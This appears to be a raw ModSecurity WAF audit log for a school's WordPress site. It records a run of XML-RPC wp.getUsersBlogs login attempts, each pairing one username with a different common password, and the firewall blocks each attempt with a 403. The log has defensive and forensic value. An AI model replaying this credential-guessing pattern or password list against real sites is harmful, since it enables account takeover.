Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745073519567944 4880 (- - -)
Stopwatch2: 1745073519567944 4880; combined=3777, p1=449, p2=3158, p3=0, p4=0, p5=104, sr=88, sw=66, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8b518647-Z--
--ffb5730d-A--
[19/Apr/2025:21:39:41 +0700] aAO1rUruoUXZj665VUEcKAAAAM8 103.236.140.4 54198 103.236.140.4 8181
--ffb5730d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ffb5730d-C--
wp.getUsersBlogs
wakasarpras
pass123
--ffb5730d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ffb5730d-E--
--ffb5730d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745073581668809 4355 (- - -)
Stopwatch2: 1745073581668809 4355; combined=3089, p1=365, p2=2558, p3=0, p4=0, p5=95, sr=77, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ffb5730d-Z--
--cd776d37-A--
[19/Apr/2025:21:40:47 +0700] aAO17-vDiFC_ir7MDwYHEAAAAE0 103.236.140.4 60792 103.236.140.4 8181
--cd776d37-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--cd776d37-C--
wp.getUsersBlogs
wakasarpras
1111111
--cd776d37-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cd776d37-E--
--cd776d37-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (20+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745073647144096 4419 (- - -)
Stopwatch2: 1745073647144096 4419; combined=3061, p1=379, p2=2461, p3=0, p4=0, p5=128, sr=69, sw=93, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cd776d37-Z--
--7ea12c10-A--
[19/Apr/2025:21:41:52 +0700] aAO2MEruoUXZj665VUEf8gAAANg 103.236.140.4 39322 103.236.140.4 8181
--7ea12c10-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--7ea12c10-C--
wp.getUsersBlogs
wakasarpras
1234abcd
--7ea12c10-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7ea12c10-E--
--7ea12c10-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745073712959667 4714 (- - -)
Stopwatch2: 1745073712959667 4714; combined=3413, p1=392, p2=2827, p3=0, p4=0, p5=110, sr=79, sw=84, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7ea12c10-Z--
--02854a52-A--
[19/Apr/2025:21:43:01 +0700] aAO2dXNa4dA2HllpK_OfbAAAAI0 103.236.140.4 46150 103.236.140.4 8181
--02854a52-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--02854a52-C--
wp.getUsersBlogs
wakasarpras
123!@#
--02854a52-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--02854a52-E--
--02854a52-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745073781599558 5248 (- - -)
Stopwatch2: 1745073781599558 5248; combined=3796, p1=465, p2=3080, p3=0, p4=0, p5=146, sr=86, sw=105, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--02854a52-Z--
--9f9d1a62-A--
[19/Apr/2025:21:44:04 +0700] aAO2tOvDiFC_ir7MDwYMoAAAAE4 103.236.140.4 52238 103.236.140.4 8181
--9f9d1a62-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--9f9d1a62-C--
wp.getUsersBlogs
wakasarpras
1g2w3e4r
--9f9d1a62-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9f9d1a62-E--
--9f9d1a62-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745073844952605 4696 (- - -)
Stopwatch2: 1745073844952605 4696; combined=3552, p1=422, p2=2963, p3=0, p4=0, p5=100, sr=81, sw=67, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9f9d1a62-Z--
--30561d16-A--
[19/Apr/2025:21:45:04 +0700] aAO28OvDiFC_ir7MDwYN6QAAAFQ 103.236.140.4 58070 103.236.140.4 8181
--30561d16-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--30561d16-C--
wp.getUsersBlogs
wakasarpras
peaches
--30561d16-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--30561d16-E--
--30561d16-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745073904285610 4158 (- - -)
Stopwatch2: 1745073904285610 4158; combined=2791, p1=369, p2=2268, p3=0, p4=0, p5=89, sr=67, sw=65, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--30561d16-Z--
--c1719f63-A--
[19/Apr/2025:21:46:05 +0700] aAO3LQ6cTFSgLAHl7PoFQAAAAAo 103.236.140.4 35990 103.236.140.4 8181
--c1719f63-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--c1719f63-C--
wp.getUsersBlogs
wakasarpras
212121
--c1719f63-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c1719f63-E--
--c1719f63-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745073965359744 3880 (- - -)
Stopwatch2: 1745073965359744 3880; combined=2894, p1=394, p2=2356, p3=0, p4=0, p5=86, sr=70, sw=58, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c1719f63-Z--
--1bcc0a39-A--
[19/Apr/2025:21:47:06 +0700] aAO3anNa4dA2HllpK_OlNQAAAI8 103.236.140.4 41794 103.236.140.4 8181
--1bcc0a39-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--1bcc0a39-C--
wp.getUsersBlogs
wakasarpras
muffin
--1bcc0a39-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1bcc0a39-E--
--1bcc0a39-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745074026072329 5177 (- - -)
Stopwatch2: 1745074026072329 5177; combined=3576, p1=470, p2=2938, p3=0, p4=0, p5=100, sr=88, sw=68, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1bcc0a39-Z--
--7bce4c0d-A--
[19/Apr/2025:21:48:06 +0700] aAO3pkruoUXZj665VUEojQAAAMw 103.236.140.4 47496 103.236.140.4 8181
--7bce4c0d-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--7bce4c0d-C--
wp.getUsersBlogs
wakasarpras
madison1
--7bce4c0d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7bce4c0d-E--
--7bce4c0d-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745074086325193 5499 (- - -)
Stopwatch2: 1745074086325193 5499; combined=4142, p1=519, p2=3438, p3=0, p4=0, p5=111, sr=95, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7bce4c0d-Z--
--6b9ee41a-A--
[19/Apr/2025:21:49:06 +0700] aAO34kruoUXZj665VUEpggAAAM0 103.236.140.4 52990 103.236.140.4 8181
--6b9ee41a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 230
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6b9ee41a-C--
wp.getUsersBlogs
wakasarpras
marketing2024
--6b9ee41a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6b9ee41a-E--
--6b9ee41a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745074146310653 5990 (- - -)
Stopwatch2: 1745074146310653 5990; combined=4368, p1=481, p2=3551, p3=0, p4=0, p5=183, sr=89, sw=153, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6b9ee41a-Z--
--fcde1a18-A--
[19/Apr/2025:21:50:10 +0700] aAO4Ig6cTFSgLAHl7PoLMgAAAAA 103.236.140.4 59576 103.236.140.4 8181
--fcde1a18-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--fcde1a18-C--
wp.getUsersBlogs
wakasarpras
tiffany
--fcde1a18-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fcde1a18-E--
--fcde1a18-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745074210909457 5285 (- - -)
Stopwatch2: 1745074210909457 5285; combined=3821, p1=478, p2=3154, p3=0, p4=0, p5=112, sr=95, sw=77, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fcde1a18-Z--
--f1c9b05c-A--
[19/Apr/2025:21:51:12 +0700] aAO4YEruoUXZj665VUEtrAAAAMY 103.236.140.4 37582 103.236.140.4 8181
--f1c9b05c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 240
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--f1c9b05c-C--
wp.getUsersBlogs
wakasarpras
smkn22-jkt_sch_id123456
--f1c9b05c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f1c9b05c-E--
--f1c9b05c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745074272360944 4767 (- - -)
Stopwatch2: 1745074272360944 4767; combined=3485, p1=430, p2=2884, p3=0, p4=0, p5=100, sr=81, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f1c9b05c-Z--
--09f73e23-A--
[19/Apr/2025:21:52:16 +0700] aAO4oEruoUXZj665VUEv2gAAANE 103.236.140.4 44006 103.236.140.4 8181
--09f73e23-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--09f73e23-C--
wp.getUsersBlogs
wakasarpras
QWERT
--09f73e23-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--09f73e23-E--
--09f73e23-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745074336199691 4971 (- - -)
Stopwatch2: 1745074336199691 4971; combined=3485, p1=446, p2=2876, p3=0, p4=0, p5=95, sr=90, sw=68, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--09f73e23-Z--
--45c3691c-A--
[19/Apr/2025:21:53:16 +0700] aAO43EruoUXZj665VUExfAAAANI 103.236.140.4 50096 103.236.140.4 8181
--45c3691c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--45c3691c-C--
wp.getUsersBlogs
wakasarpras
Webadmin
--45c3691c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--45c3691c-E--
--45c3691c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745074396223366 5876 (- - -)
Stopwatch2: 1745074396223366 5876; combined=4403, p1=501, p2=3716, p3=0, p4=0, p5=109, sr=89, sw=77, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--45c3691c-Z--
--0f21c630-A--
[19/Apr/2025:21:54:17 +0700] aAO5GevDiFC_ir7MDwYbvQAAAEM 103.236.140.4 56340 103.236.140.4 8181
--0f21c630-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--0f21c630-C--
wp.getUsersBlogs
wakasarpras
aaa
--0f21c630-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0f21c630-E--
--0f21c630-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (27+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745074457936825 5275 (- - -)
